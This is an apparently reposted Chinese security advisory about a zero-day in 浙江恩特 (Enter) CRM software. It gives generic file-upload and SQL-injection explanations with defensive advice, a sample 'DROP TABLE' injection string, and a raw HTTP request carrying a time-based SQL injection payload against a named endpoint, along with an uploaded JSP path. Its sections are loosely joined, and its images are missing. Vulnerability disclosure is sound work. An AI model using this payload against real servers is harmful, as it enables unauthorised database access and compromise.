【紧急警告】某大科恩CMR 0day

admin 2023年11月19日11:37:20评论24 views字数 1409阅读4分41秒阅读模式
免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

——鼹鼠

1.描述

浙江恩特是一家公司,专注于特种工业制冷领域,为客户提供专业的研发、设计和服务

这种漏洞允许攻击者上传他们自己的文件到服务器的特定位置。如果上传的文件是可执行的,那么攻击者可能能够运行恶意代码,从而控制服务器。这可能会导致数据泄露、系统损坏或其他安全问题。

为了防止这种漏洞,你应该在服务器端实施以下安全措施:

文件类型限制:只允许上传特定类型的文件,如文本文件、图片或PDF,禁止上传可执行文件。
文件名处理:对上传的文件进行重命名,避免使用攻击者控制的文件名。
文件权限设置:确保上传的文件保存在服务器上的安全位置,并设置合适的文件权限,禁止执行可执行文件。
SQL注入漏洞:

SQL注入是一种常见的网络安全攻击,攻击者通过在输入框中输入恶意SQL代码,将其注入到数据库查询中,从而获取敏感信息或执行恶意操作。

例如,攻击者可以在输入框中输入类似于这样的代码:"'; DROP TABLE users; --" ,这将导致数据库中的"users"表被删除。

为了防止SQL注入漏洞,你应该在服务器端实施以下安全措施:

输入验证:对用户输入进行严格的验证和过滤,确保输入的数据符合预期格式,避免包含恶意SQL代码。
参数化查询:使用预编译的SQL语句或参数化查询来执行数据库操作,而不是直接拼接用户输入到SQL查询中。这可以防止攻击者注入恶意SQL代码。
最小权限原则:使用具有最小权限的数据库账户来执行查询操作,避免给予攻击者过多的权限。
数据库安全配置:对数据库进行安全配置,如禁用不必要的数据库功能、限制数据库账户的权限等。
更新和打补丁:及时更新数据库软件和补丁,以修复已知的安全漏洞。

【紧急警告】某大科恩CMR 0day

2.使用搜索引擎搜索

【紧急警告】某大科恩CMR 0day

3.溯源漏洞
GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: ip:port

Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0

【紧急警告】某大科恩CMR 0day
【紧急警告】某大科恩CMR 0day

然后的访问路径:http://ip:port/enterdoc/EnterMail/20231118/2023111819455396702806276/check.jsp

【紧急警告】某大科恩CMR 0day

4.pocsuite漏洞检测

【紧急警告】某大科恩CMR 0day
【紧急警告】某大科恩CMR 0day
【紧急警告】某大科恩CMR 0day

原文始发于微信公众号(天盾信安):【紧急警告】某大科恩CMR 0day

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月19日11:37:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【紧急警告】某大科恩CMR 0dayhttps://cn-sec.com/archives/2219340.html

发表评论

匿名网友 填写信息